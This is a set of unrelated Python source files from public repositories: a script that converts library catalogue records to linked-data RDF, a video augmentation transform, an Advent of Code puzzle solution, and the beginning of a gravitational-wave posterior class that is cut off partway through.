\"AkademischeR BetreuerIn\",\n \"dir\": \"Dirigent\",\n \"dis\": \"PromovierendeR\",\n \"dln\": \"VorzeichnerIn\",\n 
\"dnc\": \"TänzerIn\",\n \"dnr\": \"GeldgeberIn\",\n \"dpc\": \"AbgebildeteR\",\n \"dpt\": \"AnlegerIn\",\n \"drm\": \"TechnischeR ZeichnerIn\",\n \"drt\": \"RegisseurIn\",\n \"dsr\": \"DesignerIn\",\n \"dst\": \"Vertrieb\",\n \"dtc\": \"BereitstellerIn von Daten\",\n \"dte\": \"WidmungsempfängerIn\",\n \"dtm\": \"DatenmanagerIn\",\n \"dto\": \"WidmendeR\",\n \"dub\": \"angeblicheR AutorIn\",\n \"edc\": \"BearbeiterIn der Zusammenstellung\",\n \"edm\": \"CutterIn\",\n \"edt\": \"HerausgeberIn\",\n \"egr\": \"StecherIn\",\n \"elg\": \"ElektrikerIn\",\n \"elt\": \"GalvanisiererIn\",\n \"eng\": \"IngenieurIn\",\n \"enj\": \"Normerlassende Gebietskörperschaft\",\n \"etr\": \"RadiererIn\",\n \"evp\": \"Veranstaltungsort\",\n \"exp\": \"ExperteIn\",\n \"fac\": \"FacsimilistIn\",\n \"fds\": \"Filmvertrieb\",\n \"fld\": \"BereichsleiterIn\",\n \"flm\": \"BearbeiterIn des Films\",\n \"fmd\": \"FilmregisseurIn\",\n \"fmk\": \"FilmemacherIn\",\n \"fmo\": \"frühereR BesitzerIn\",\n \"fmp\": \"FilmproduzentIn\",\n \"fnd\": \"GründerIn\",\n \"fpy\": \"Erste Partei\",\n \"frg\": \"FälscherIn\",\n \"gis\": \"GeographIn\",\n \"grt\": \"GraphischeR TechnikerIn\",\n \"hg\": \"Herausgeber\",\n \"his\": \"Gastgebende Institution\",\n \"hnr\": \"GefeierteR\",\n \"hst\": \"GastgeberIn\",\n \"Ill\": \"Illustrator\",\n \"ill\": \"IllustratorIn\",\n \"ilu\": \"Illuminator, BuchmalerIn\",\n \"ins\": \"InserierendeR\",\n \"inv\": \"ErfinderIn\",\n \"isb\": \"Herausgebendes Organ\",\n \"itr\": \"InstrumentalmusikerIn\",\n \"ive\": \"InterviewteR\",\n \"ivr\": \"InterviewerIn\",\n \"jud\": \"RichterIn\",\n \"jug\": \"zuständige Gerichtsbarkeit\",\n \"kad\": \"Kadenzverfasser\",\n \"lbr\": \"Labor\",\n \"lbt\": \"LibrettistIn\",\n \"ldr\": \"Laborleitung\",\n \"led\": \"Führung\",\n \"lee\": \"Libelee-appellee\",\n \"lel\": \"BeklagteR im Seerecht/Kirchenrecht\",\n \"len\": \"LeihgeberIn\",\n \"let\": \"Libelee-appellant\",\n \"lgd\": \"LichtgestalterIn\",\n \"lie\": \"Libelant-appellee\",\n \"lil\": \"KlägerIn im Seerecht/Kirchenrecht\",\n \"lit\": \"Libelant-appellant\",\n \"lsa\": \"LandschaftsarchitektIn\",\n \"lse\": \"LizenznehmerIn\",\n \"lso\": \"LizenzgeberIn\",\n \"ltg\": \"LithographIn\",\n \"lyr\": \"TextdichterIn\",\n \"mcp\": \"ArrangeurIn, Notenleser/-schreiberIn\",\n \"mdc\": \"Metadatenkontakt\",\n \"med\": \"Medium\",\n \"mfp\": \"Herstellungsort\",\n \"mfr\": \"HerstellerIn\",\n \"mod\": \"ModeratorIn\",\n \"mon\": \"BeobachterIn\",\n \"mrb\": \"MarmorarbeiterIn, MarmoriererIn\",\n \"mrk\": \"Markup-EditorIn\",\n \"msd\": \"MusikalischeR LeiterIn\",\n \"mte\": \"Metall-GraveurIn\",\n \"mtk\": \"ProtokollantIn\",\n \"mus\": \"MusikerIn\",\n \"nrt\": \"ErzählerIn\",\n \"opn\": \"GegnerIn\",\n \"org\": \"UrheberIn\",\n \"orm\": \"VeranstalterIn\",\n \"osp\": \"On-screen PräsentatorIn\",\n \"oth\": \"BerichterstatterIn\",\n \"own\": \"BesitzerIn\",\n \"pan\": \"DiskussionsteilnehmerIn\",\n \"pat\": \"SchirmherrIn\",\n \"pbd\": \"Verlagsleitung\",\n \"pbl\": \"Verlag\",\n \"pdr\": \"Projektleitung\",\n \"pfr\": \"Korrektur\",\n \"pht\": \"FotografIn\",\n \"plt\": \"DruckformherstellerIn\",\n \"pma\": \"Genehmigungsstelle\",\n \"pmn\": \"Produktionsleitung\",\n \"pop\": \"PlattendruckerIn\",\n \"ppm\": \"PapiermacherIn\",\n \"ppt\": \"PuppenspielerIn\",\n \"pra\": \"Praeses\",\n \"prc\": \"Prozesskontakt\",\n \"prd\": \"Produktionspersonal\",\n \"pre\": \"PräsentatorIn\",\n \"prf\": \"AusführendeR\",\n \"prg\": \"ProgrammiererIn\",\n \"prm\": \"DruckgrafikerIn\",\n \"prn\": \"Produktionsfirma\",\n \"pro\": 
\"ProduzentIn\",\n \"prp\": \"Produktionsort\",\n \"prs\": \"SzenenbildnerIn\",\n \"prt\": \"DruckerIn\",\n \"prv\": \"AnbieterIn\",\n \"pta\": \"PatentanwärterIn\",\n \"pte\": \"KlägerIn-BerufungsbeklagteR\",\n \"ptf\": \"ZivilklägerIn\",\n \"pth\": \"PatentinhaberIn\",\n \"ptt\": \"KlägerIn-BerufungsklägerIn\",\n \"pup\": \"Veröffentlichungsort\",\n \"rbr\": \"RubrikatorIn\",\n \"rcd\": \"TonmeisterIn\",\n \"rce\": \"ToningenieurIn\",\n \"rcp\": \"AdressatIn\",\n \"rdd\": \"HörfunkregisseurIn\",\n \"Red\": \"Redakteur\",\n \"red\": \"RedakteurIn\",\n \"ren\": \"RendererIn (Bildverarbeitung)\",\n \"res\": \"ForscherIn\",\n \"rev\": \"RezensentIn, GutachterIn\",\n \"rpc\": \"HörfunkproduzentIn\",\n \"rps\": \"Aufbewahrungsort, TreuhänderIn\",\n \"rpt\": \"ReporterIn\",\n \"rpy\": \"Verantwortliche Partei\",\n \"rse\": \"AntragsgegnerIn-BerufungsbeklagteR\",\n \"rsg\": \"RegisseurIn der Wiederaufführung\",\n \"rsp\": \"RespondentIn\",\n \"rsr\": \"RestauratorIn\",\n \"rst\": \"AntragsgegnerIn-BerufungsklägerIn\",\n \"rth\": \"Leitung des Forschungsteams\",\n \"rtm\": \"Mitglied des Forschungsteams\",\n \"sad\": \"WissenschaftlicheR BeraterIn\",\n \"sce\": \"DrehbuchautorIn\",\n \"scl\": \"BildhauerIn\",\n \"scr\": \"SchreiberIn\",\n \"sds\": \"Tongestalter\",\n \"sec\": \"SekretärIn\",\n \"sgd\": \"BühnenregisseurIn\",\n \"sgn\": \"UnterzeichnerIn\",\n \"sht\": \"Unterstützender Veranstalter\",\n \"sll\": \"VerkäuferIn\",\n \"sng\": \"SängerIn\",\n \"spk\": \"RednerIn\",\n \"spn\": \"SponsorIn\",\n \"spy\": \"Zweite Partei\",\n \"srv\": \"LandvermesserIn\",\n \"std\": \"BühnenbildnerIn\",\n \"stg\": \"Kulisse\",\n \"stl\": \"GeschichtenerzählerIn\",\n \"stm\": \"InszenatorIn\",\n \"stn\": \"Normungsorganisation\",\n \"str\": \"StereotypeurIn\",\n \"tcd\": \"Technische Leitung\",\n \"tch\": \"LehrerIn\",\n \"ths\": \"BetreuerIn (Doktorarbeit)\",\n \"tld\": \"FernsehregisseurIn\",\n \"tlp\": \"FernsehproduzentIn\",\n \"trc\": \"TranskribiererIn\",\n \"trl\": \"ÜbersetzerIn\",\n \"tyd\": \"Schrift-DesignerIn\",\n \"tyg\": \"SchriftsetzerIn\",\n \"uvp\": \"Hochschulort\",\n \"vac\": \"SynchronsprecherIn\",\n \"vdg\": \"BildregisseurIn\",\n \"voc\": \"VokalistIn\",\n \"wac\": \"KommentarverfasserIn\",\n \"wal\": \"VerfasserIn von zusätzlichen Lyrics\",\n \"wam\": \"AutorIn des Begleitmaterials\",\n \"wat\": \"VerfasserIn von Zusatztexten\",\n \"wdc\": \"HolzschneiderIn\",\n \"wde\": \"HolzschnitzerIn\",\n \"win\": \"VerfasserIn einer Einleitung\",\n \"wit\": \"ZeugeIn\",\n \"wpr\": \"VerfasserIn eines Vorworts\",\n \"wst\": \"VerfasserIn von ergänzendem Text\"\n}\n\nbaseuri = \"http://data.finc.info/resources/\"\n\n\nprop2isil = {\"swb_id_str\": \"(DE-576)\",\n \"kxp_id_str\": \"(DE-627)\"\n }\n\n\ndef fixRecord(record=\"\", record_id=0, validation=False, replaceMethod='decimal'):\n replaceMethods = {\n 'decimal': (('#29;', '#30;', '#31;'), (\"\\x1D\", \"\\x1E\", \"\\x1F\")),\n 'unicode': (('\\u001d', '\\u001e', '\\u001f'), (\"\\x1D\", \"\\x1E\", \"\\x1F\")),\n 'hex': (('\\x1D', '\\x1E', '\\x1F'), (\"\\x1D\", \"\\x1E\", \"\\x1F\"))\n }\n marcFullRecordFixed=record\n for i in range(0, 3):\n marcFullRecordFixed=marcFullRecordFixed.replace(replaceMethods.get(replaceMethod)[0][i], replaceMethods.get(replaceMethod)[1][i])\n if validation:\n try:\n reader = pymarc.MARCReader(marcFullRecordFixed.encode('utf8'), utf8_handling='replace')\n marcrecord = next(reader)\n except (RecordLengthInvalid, RecordLeaderInvalid, BaseAddressNotFound, BaseAddressInvalid, RecordDirectoryInvalid, NoFieldsFound, 
UnicodeDecodeError) as e:\n            eprint(\"record id {0}:\".format(record_id)+str(e))\n            with open('invalid_records.txt', 'a') as error:\n                print(marcFullRecordFixed, file=error)\n            return None\n    return marcFullRecordFixed\n\n\ndef ArrayOrSingleValue(array):\n    '''\n    return an array\n    if there is only a single value, only return that single value\n    '''\n    if isinstance(array, (int, float)):\n        return array\n    if array:\n        length = len(array)\n        if length > 1 or isinstance(array, dict):\n            return array\n        elif length == 1:\n            for elem in array:\n                return elem\n        elif length == 0:\n            return None\n\n\ndef eprint(*args, **kwargs):\n    '''\n    print to stderr\n    '''\n    print(*args, file=sys.stderr, **kwargs)\n\n\ndef getIDs(record, prop):\n    if isinstance(prop, str):\n        if prop in prop2isil and prop in record:\n            return str(prop2isil[prop]+record[prop])\n        elif prop in record and not prop in prop2isil:\n            return str(record[prop])\n    elif isinstance(prop, list):\n        ret = []\n        for elem in prop:\n            if elem in prop2isil and elem in record:\n                ret.append(str(prop2isil[elem]+record[elem]))\n            elif elem in record and not elem in prop2isil:\n                ret.append(record[elem])\n        if ret:\n            return ret\n\n\ndef getoAC(record, prop):\n    if isinstance(record.get(prop), str):\n        if record.get(prop) == \"Free\":\n            return \"Yes\"\n    elif isinstance(record.get(prop), list):\n        for elem in record.get(prop):\n            if elem == \"Free\":\n                return \"Yes\"\n\n\ndef getAtID(record, prop):\n    if record.get(prop):\n        return baseuri+record[prop]\n\n\ndef getGND(record, prop):\n    ret = []\n    if isinstance(record.get(prop), str):\n        return \"http://d-nb.info/gnd/\"+record.get(prop)\n    elif isinstance(record.get(prop), list):\n        for elem in record.get(prop):\n            ret.append(\"http://d-nb.info/gnd/\"+elem)\n    if ret:\n        return ret\n    else:\n        return None\n\n\ndef getLanguage(record, prop):\n    lang = getProperty(record, prop)\n    if lang:\n        language = {\"en\": lang}\n        return language\n\n\ndef getTitle(record, prop):\n    title = getProperty(record, prop)\n    if title:\n        if isinstance(title, str):\n            if title[-2:] == \" /\":\n                title = title[:-2]\n        elif isinstance(title, list):\n            for n, elem in enumerate(title):\n                if elem[-2:] == \" /\":\n                    title[n] = title[n][:-2]\n        return title\n\n\ndef getformat(record, prop, formattable):\n    if isinstance(record.get(prop), str) and record.get(prop) in formattable:\n        return formattable.get(record.get(prop))\n    elif isinstance(record.get(prop), list):\n        for elem in record.get(prop):\n            if elem in formattable:\n                return formattable.get(elem)\n\n\ndef getFormatRdfType(record, prop):\n    formatmapping = {\"Article, E-Article\": \"bibo:Article\",\n                     \"Book, E-Book\": \"bibo:Book\",\n                     \"Journal, E-Journal\": \"bibo:Periodical\",\n                     \"Manuscript\": \"bibo:Manuscript\",\n                     \"Map\": \"bibo:Map\",\n                     \"Thesis\": \"bibo:Thesis\",\n                     \"Video\": \"bibo:AudioVisualDocument\"\n                     }\n    value = getformat(record, prop, formatmapping)\n    if value:\n        return {\"@id\": value}\n    else:\n        return {\"@id\": \"bibo:Document\"}\n\n\ndef getFormatDctMedium(record, prop):\n    formatmapping = {\"Audio\": \"rdamt:1001\",\n                     \"Microform\": \"rdamt:1002\",\n                     \"Notated Music\": \"rdau:P60488\"\n                     }\n    value = getformat(record, prop, formatmapping)\n    return value if value else None\n\n\ndef getOfferedBy(record, prop):\n    if record.get(prop):\n        return {\n            \"@type\": \"http://schema.org/Offer\",\n            \"schema:offeredBy\": {\n                \"@id\": \"https://data.finc.info/organisation/DE-15\",\n                \"@type\": \"schema:Library\",\n                \"schema:name\": \"Universitätsbibliothek Leipzig\",\n                \"schema:branchCode\": \"DE-15\"\n            },\n            
\"schema:availability\": \"http://data.ub.uni-leipzig.de/item/wachtl/DE-15:ppn:\"+record[prop]\n }\n\n\ndef getProperty(record, prop):\n ret = []\n if isinstance(prop, str):\n if prop in record:\n return record.get(prop)\n elif isinstance(prop, list):\n for elem in prop:\n if isinstance(record.get(elem), str):\n ret.append(record[elem])\n elif isinstance(record.get(elem), list):\n for elen in record[elem]:\n ret.append(elen)\n if ret:\n return ret\n else:\n return None\n\n\ndef getIsPartOf(record, prop):\n data = getProperty(record, prop)\n if isinstance(data, str):\n return {\"@id\": \"https://data.finc.info/resources/\"+data}\n elif isinstance(data, list):\n ret = []\n for elem in data:\n ret.append({\"@id\": \"https://data.finc.info/resources/\"+elem})\n return ret\n\n\ndef getIssued(record, prop):\n data = getProperty(record, prop)\n if isinstance(data, str):\n return {context.get(\"dateTime\"): data}\n elif isinstance(data, list):\n ret = []\n for elem in data:\n ret.append({\"@type\": \"xsd:gYear\",\n \"@value\": elem})\n return ret\n\n\n\"\"\"...\n \"contribution\" : [ {\n \"type\" : [ \"Contribution\" ],\n \"agent\" : {\n \"id\" : \"http://d-nb.info/gnd/1049709292\",\n \"type\" : [ \"Person\" ],\n \"dateOfBirth\" : \"1974\",\n \"gndIdentifier\" : \"1049709292\",\n \"label\" : \"Nichols, Catherine\" \n },\n \"role\" : {\n \"id\" : \"http://id.loc.gov/vocabulary/relators/edt\",\n \"label\" : \"Herausgeber/in\" \n }\n }, {\n \"type\" : [ \"Contribution\" ],\n \"agent\" : {\n \"id\" : \"http://d-nb.info/gnd/130408026\",\n \"type\" : [ \"Person\" ],\n \"dateOfBirth\" : \"1951\",\n \"gndIdentifier\" : \"130408026\",\n \"label\" : \"Blume, Eugen\" \n },\n \"role\" : {\n \"id\" : \"http://id.loc.gov/vocabulary/relators/ctb\",\n \"label\" : \"Mitwirkende\" \n }\n }\n\"\"\"\n\n\ndef get_contributon(record, prop):\n fullrecord_fixed = fixRecord(record=getProperty(record, prop), record_id=record.get(\n \"record_id\"), validation=False, replaceMethod='decimal')\n reader = pymarc.MARCReader(fullrecord_fixed.encode('utf-8'))\n data = []\n fields = [\"100\", \"110\", \"111\", \"700\", \"710\", \"711\"]\n for record in reader:\n for field in fields:\n for f in record.get_fields(field):\n contributor = {\n \"@type\": [\"bf:Contribution\"],\n \"bf:agent\": {\n \"@id\": \"http://d-nb.info/gnd/\"\n },\n \"bf:role\": {\n \"@id\": \"http://id.loc.gov/vocabulary/relators/\",\n }\n }\n if f['a']:\n contributor[\"bf:agent\"][\"rdfs:ch_label\"] = f['a']\n if f['0'] and f['0'].startswith(\"(DE-588)\"):\n contributor[\"bf:agent\"][\"@id\"] += f['0'].split(\")\")[1]\n else:\n del contributor['bf:agent']['@id']\n if f['4'] and len(f['4']) <= 4:\n if f['4'][0] == '-':\n contributor['bf:role']['@id'] += f['4'][1:]\n if rolemapping.get(f['4'][1:]):\n contributor['bf:role']['rdfs:ch_label'] = rolemapping[f['4'][1:]]\n else:\n contributor['bf:role']['@id'] += f['4']\n if rolemapping.get(f['4']):\n contributor['bf:role']['rdfs:ch_label'] = rolemapping[f['4']]\n else:\n del contributor['bf:role']\n if field[1:] == \"00\":\n contributor['bf:agent']['@type'] = 'bf:Person'\n elif field[1:] == \"10\":\n contributor['bf:agent']['@type'] = 'bf:Organization'\n elif field[1:] == \"11\":\n contributor['bf:agent']['@type'] = 'bf:Meeting'\n if contributor['bf:agent'].get('rdfs:ch_label'):\n data.append(contributor)\n\n return data if data else None\n\n\ndef get_rvk(record, prop):\n if prop in record:\n for rvk in record[prop]:\n if rvk == \"No subject assigned\":\n continue\n elif isinstance(rvk, str):\n return 
str(\"https://rvk.uni-regensburg.de/regensburger-verbundklassifikation-online#notation/{}\".format(rvk))\n\n\ndef putContext(record):\n    return context\n\n# mapping={ \"target_field\":\"someString\"},\n\n# \"target_field\":{function:\"source_field\"}}\n\n\ncontext = {\n    \"xsd\": \"http://www.w3.org/2001/XMLSchema#\",\n    \"bf\": \"http://id.loc.gov/ontologies/bibframe/\",\n    \"dct\": \"http://purl.org/dc/terms/\",\n    \"dc\": \"http://purl.org/dc/terms/\",\n    \"bibo\": \"http://purl.org/ontology/bibo/\",\n    \"rdau\": \"http://rdaregistry.info/Elements/u/\",\n    \"umbel\": \"http://umbel.org/umbel/\",\n    \"isbd\": \"http://iflastandards.info/ns/isbd/elements/\",\n    \"schema\": \"http://schema.org/\",\n    \"rdfs\": \"https://www.w3.org/TR/rdf-schema/#\",\n    \"issued\": {\n        \"@id\": \"dct:issued\",\n        \"@type\": \"xsd:gYear\"\n    },\n    \"identifier\": {\n        \"@id\": \"dct:identifier\",\n        \"@type\": \"xsd:string\"\n    },\n    \"language\": {\n        \"@id\": \"http://purl.org/dc/terms/language\",\n        \"@container\": \"@language\"\n    },\n    \"openAccessContent\": \"http://dbpedia.org/ontology/openAccessContent\",\n}\n\n\nmapping = {\n    \"@context\": putContext,\n    \"@id\": {getAtID: \"id\"},\n    \"identifier\": {getIDs: [\"swb_id_str\", \"kxp_id_str\"]},\n    \"bibo:issn\": {getProperty: \"issn\"},\n    \"bibo:isbn\": {getProperty: \"isbn\"},\n    \"umbel:isLike\": {getProperty: \"url\"},\n    \"dct:title\": {getTitle: \"title\"},\n    \"rdau:P60493\": {getTitle: [\"title_part\", \"title_sub\"]},\n    \"bibo:shortTitle\": {getTitle: \"title_short\"},\n    \"dct:alternative\": {getTitle: \"title_alt\"},\n    \"rdau:P60327\": {getProperty: \"author\"},\n    \"dc:contributor\": {getProperty: \"author2\"},\n    # \"author_id\":{getGND:\"author_id\"},\n    \"rdau:P60333\": {getProperty: \"imprint_str_mv\"},\n    \"rdau:P60163\": {getProperty: \"publishPlace\"},\n    \"dct:publisher\": {getProperty: \"publisher\"},\n    \"issued\": {getIssued: \"publishDate\"},\n    \"rdau:P60489\": {getProperty: \"dissertation_note\"},\n    \"isbd:P1053\": {getProperty: \"physical\"},\n    \"language\": {getLanguage: \"language\"},\n    \"dct:isPartOf\": {getIsPartOf: \"hierarchy_top_id\"},\n    \"dct:bibliographicCitation\": {getProperty: [\"container_title\", \"container_reference\"]},\n    \"rdfs:ch_type\": {getFormatRdfType: \"format_finc\"},\n    \"dct:medium\": {getFormatDctMedium: \"format_finc\"},\n    \"openAccessContent\": {getoAC: \"facet_avail\"},\n    \"schema:offers\": {getOfferedBy: \"record_id\"},\n    \"bf:contribution\": {get_contributon: \"fullrecord\"},\n    \"umbel:relatesToNotation\": {get_rvk: \"rvk_facet\"}\n}\n\n\ndef process_field(record, source_field):\n    ret = []\n    if isinstance(source_field, dict):\n        for function, parameter in source_field.items():\n            ret.append(function(record, parameter))\n    elif isinstance(source_field, str):\n        return source_field\n    elif isinstance(source_field, list):\n        for elem in source_field:\n            ret.append(ArrayOrSingleValue(process_field(record, elem)))\n    elif callable(source_field):\n        return ArrayOrSingleValue(source_field(record))\n    if ret:\n        return ArrayOrSingleValue(ret)\n\n\ndef removeNone(obj):\n    if isinstance(obj, (list, tuple, set)):\n        return type(obj)(removeNone(x) for x in obj if x is not None)\n    elif isinstance(obj, dict):\n        return type(obj)((removeNone(k), removeNone(v))\n                         for k, v in obj.items() if k is not None and v is not None)\n    else:\n        return obj\n\n\nlock = Lock()\n\n\ndef process_line(record):\n    try:\n        mapline = {}\n        for key, val in mapping.items():\n            value = process_field(record, val)\n            if value:\n                mapline[key] = value\n        mapline = removeNone(mapline)\n        if mapline:\n            with 
lock:\n sys.stdout.write(json.dumps(mapline, indent=None)+\"\\n\")\n sys.stdout.flush()\n except Exception as e:\n with open(\"errors.txt\", 'a') as f:\n traceback.print_exc(file=f)\n\n\ndef gen_solrdump_cmd(host):\n fl = set()\n for k, v in mapping.items():\n if not callable(v):\n for c, w in v.items():\n if isinstance(w, str):\n fl.add(w)\n elif isinstance(w, list):\n for elem in w:\n fl.add(elem)\n return \"solrdump -verbose -server {} -fl {}\".format(host, ','.join(fl))\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='simple LOD Mapping of FINC-Records')\n parser.add_argument('-gen_cmd', action=\"store_true\",\n help='generate bash command')\n parser.add_argument(\n '-server', type=str, help=\"which server to use for harvest, only used for cmd prompt definition\")\n args = parser.parse_args()\n if args.gen_cmd:\n print(gen_solrdump_cmd(args.server))\n quit()\n p = Pool(4)\n for line in sys.stdin:\n p.apply_async(process_line, args=(json.loads(line),))\n #target_record=process_line(json.loads(line))\n #if target_record:\n #print(json.dumps(target_record))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"slub/efre-lod-elasticsearch-tools","sub_path":"processing/finc2rdf.py","file_name":"finc2rdf.py","file_ext":"py","file_size_in_byte":23802,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"}
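The `mapping` dict in the record above drives a small dispatch engine: each target field maps to `{function: source_field}`, and `process_field` calls the function with the record and the named source. A toy, self-contained version of that pattern (the getters and record here are illustrative, not finc's real fields):

```python
# Mapping-driven field extraction, in miniature. Functions are used as
# dict keys, exactly as in the finc2rdf mapping above.
def get_property(record, prop):
    return record.get(prop)

def get_upper(record, prop):
    value = record.get(prop)
    return value.upper() if value else None

mapping = {
    "dct:title": {get_property: "title"},
    "shout": {get_upper: "title"},
}

def process_record(record):
    out = {}
    for target, spec in mapping.items():
        for func, source in spec.items():
            value = func(record, source)
            if value is not None:
                out[target] = value
    return out

print(process_record({"title": "finc"}))
# {'dct:title': 'finc', 'shout': 'FINC'}
```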
+{"seq_id":"69890583792","text":"# Kinetics default transform in MViT\n# from https://github.com/facebookresearch/SlowFast/\n# https://arxiv.org/pdf/2104.11227.pdf\nimport torch\nfrom torchvision import transforms\n\nfrom utils import clip_transforms\nfrom .rand_augment import rand_augment_transform\nfrom .random_erasing import RandomErasing\nfrom PIL import Image\n\n\ndef mvit_transform(args):\n auto_augment = \"rand-m7-n4-mstd0.5-inc1\"\n\n img_size_min = args.crop_size\n aa_params = {\"translate_const\": int(img_size_min * 0.45)}\n aa_params[\"interpolation\"] = Image.BICUBIC\n\n aug_transform = transforms.Compose([\n clip_transforms.ClipRandomResizedCrop(args.crop_size, scale=(0.08, 1.), ratio=(0.75, 1.3333333333333333)),\n rand_augment_transform(auto_augment, aa_params),\n clip_transforms.ClipRandomHorizontalFlip(p=0.0 if args.no_horizontal_flip else 0.5),\n clip_transforms.ToClipTensor(),\n clip_transforms.ClipNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n transforms.Lambda(lambda clip: torch.stack(clip, dim=0)), # T, C, H, W\n RandomErasing(0.25, mode=\"pixel\", max_count=1, num_splits=False, device=\"cpu\"),\n transforms.Lambda(lambda clip: torch.transpose(clip, 0, 1)) # C, T, H, W\n ])\n\n return aug_transform","repo_name":"ZhaofanQiu/Optimization-Planning-for-3D-ConvNets","sub_path":"utils/mvit_transform/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"72384438829","text":"with open('data/my_input/15.in') as f:\n lines = [ line.strip() for line in f]\n\nwith open('data/test/15.test') as f2:\n tests = [ test.strip() for test in f2]\n\ndef part1(vlines,num):\n d=dict()\n li= ''.join(vlines).split(\",\")\n r=1\n \n lastindex=dict()\n for i,j in enumerate(li):\n lastindex[int(j)]=i+1\n prev=int(j)\n r=i+1\n\n new=True\n while r!=num:\n r+=1\n if new :\n \n #speak\n prev=0\n \n #precalculate\n if prev in lastindex:\n d[prev]=r-lastindex[prev]\n new=False\n else:\n new=True\n \n \n #record\n lastindex[prev]=r\n\n else:\n #speak\n prev=d[prev]\n\n #precalculate\n if prev in lastindex:\n new=False\n d[prev]=r-lastindex[prev]\n else:\n new=True\n\n #record\n lastindex[prev]=r\n \n return prev\n\n\nprint(\"test part1\",part1(tests,2020))\nprint(\"output part1\",part1(lines,2020))\nprint(\"test part2\",part1(tests,30000000))\nprint(\"output part2\",part1(lines,30000000))","repo_name":"cthiounn/adventofcode-2020-python","sub_path":"day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"24827630366","text":"import numpy as np\nimport fftw3\nimport lal\nimport lalsimulation as ls\nfrom posterior_utils import *\nfrom pylal import SimInspiralUtils\nimport scipy.interpolate as si\nimport scipy.stats as st\nimport utils as u\n\nclass Posterior(object):\n \"\"\"Callable object representing the posterior.\"\"\"\n\n def __init__(self, time_data=None, freq_data=None,\n inj_params=None, inj_xml=None, event=0, srate=16384,\n T=None, time_offset=lal.LIGOTimeGPS(0),\n approx=ls.TaylorF2, amp_order=-1, phase_order=-1,\n fmin=20.0, fref=100.0, malmquist_snr=None, mmin=1.0,\n mmax=35.0, dmax=1000.0, dataseed=None,\n data_psdparams=None, detectors=['H1', 'L1', 'V1'],\n psd=None, npsdfit=4):\n r\"\"\"Set up the posterior. Currently only does PE on H1 with iIGOIGO\n analytic noise spectrum.\n\n :param time_data: A list of float arrays giving the\n time-domain data in each detector on which the analysis is\n to operate. If ``None``, then data are generated from\n Gaussian noise. The time-domain data will be windowed with\n the default Tukey window from :func:`u.tukey_window` before\n being Fourier-transformed.\n\n :param freq_data: A list of complex arrays giving the\n frequency-domain data in each detector on which the analysis\n is to operate. If both ``time_data`` and ``freq_data`` are\n ``None`` then data are generated from Gaussian noise.\n\n :param inj_params: Parameters for a waveform to be injected.\n\n :param inj_xml: XML filename describing a waveform to be\n injected.\n\n :param event: The event number (starting with zero) of the\n injection from the XML.\n\n :param srate: The sample rate, in Hz.\n\n :param T: The total length of the data segment (in seconds).\n If ``None``, extracted from ``time_data``.\n\n :param time_offset: The GPS start time of the segment being\n analyized.\n\n :param approx: The waveform approximant to use (currently only\n frequency-domain waveforms are supported).\n\n :param amp_order: The amplitude order parameter for the\n waveform. Use ``-1`` for maximum order.\n\n :param phase_order: The phase order for the waveform. Use\n ``-1`` for maximum order.\n\n :param fmin: The minimum frequency for the analysis.\n\n :param fref: The reference frequency where freq-dependent\n waveform quantities are computed.\n\n :param malmquist_snr: If not ``None``, gives the SNR threshold\n in the second-loudest detector (or only detector) below\n which the prior probability is zero.\n\n :param mmin: Minimum component mass threshold.\n\n :param mmax: Maximum component mass threshold.\n \n :param dmax: Maximum distance.\n\n :param dataseed: If not ``None``, will be used as a RNG seed\n for generating any synthetic data.\n\n :param data_psdparams: If not ``None``, the PSD fitting\n parameters to be used to modify the PSD when producing\n synthetic data. This argument only makes sense when both\n ``time_data`` and ``freq_data`` are ``None``.\n\n :param detectors: The detectors on which the analysis runs.\n\n :param psd: A list of PSDs to use instead of the synthetic\n AdLIGO PSD from LALSimultion. 
There should be one PSD per\n          detector.\n\n        :param npsdfit: The number of PSD fitting parameters to use.\n\n        \"\"\"\n\n        self._srate = srate\n        self._time_offset = u.GPSTime(time_offset.gpsSeconds, time_offset.gpsNanoSeconds)\n        self._approx = approx\n        self._amp_order = amp_order\n        self._phase_order = phase_order\n        self._fmin = fmin\n        self._fref = fref\n        self._msnr = malmquist_snr\n        self._mmin = mmin\n        self._mmax = mmax\n        self._dmax = dmax\n        self._detectors = detectors\n\n        if T is None:\n            self._T = time_data[0].shape[0]/srate\n        else:\n            self._T = T\n\n        data_length = int(round(self.T*self.srate/2+1))\n\n        self._fs = np.linspace(0, srate/2.0, self.T*self.srate/2+1)\n\n        self._npsdfit = npsdfit\n        self._psdfitfs = np.exp(np.linspace(np.log(self.fmin), np.log(self.fs[-1]), self.npsdfit))\n\n        if psd is not None:\n            # Cut the PSD down to length if it's too long\n            self._psd = [p[:self.fs.shape[0]] for p in psd]\n        else:\n            self._psd = [np.zeros(self.fs.shape[0]) for d in detectors]\n            for d, psd in zip(detectors, self.psd):\n                if d[0] == 'H' or d[0] == 'L':\n                    for i in range(self.fs.shape[0]):\n                        psd[i] = ls.SimNoisePSDaLIGOZeroDetHighPower(self.fs[i])\n                elif d[0] == 'V':\n                    for i in range(self.fs.shape[0]):\n                        psd[i] = ls.SimNoisePSDAdvVirgo(self.fs[i])\n\n        # Zero out PSD below fmin\n        for p in self.psd:\n            p[self.fs < fmin] = float('inf')\n\n        if time_data is None and freq_data is None:\n            self._data = [np.zeros(data_length, dtype=np.complex) for d in detectors]\n\n            # Maybe set seed?\n            if dataseed is not None:\n                old_state = np.random.get_state()\n                np.random.seed(dataseed)\n            \n            if data_psdparams is not None:\n                # build a structured parameter array via to_params; the class\n                # defines no ``dtype`` attribute, so ``np.zeros(1, dtype=self.dtype)``\n                # would raise AttributeError here\n                params = self.to_params(np.zeros(self.nparams))\n                params['psdfit'] = data_psdparams\n                psd = self.adjusted_psd(params)\n            else:\n                psd = self.psd\n\n            for j in range(len(detectors)):\n                # 0.5 = 1/sqrt(2) * 1/sqrt(2).  
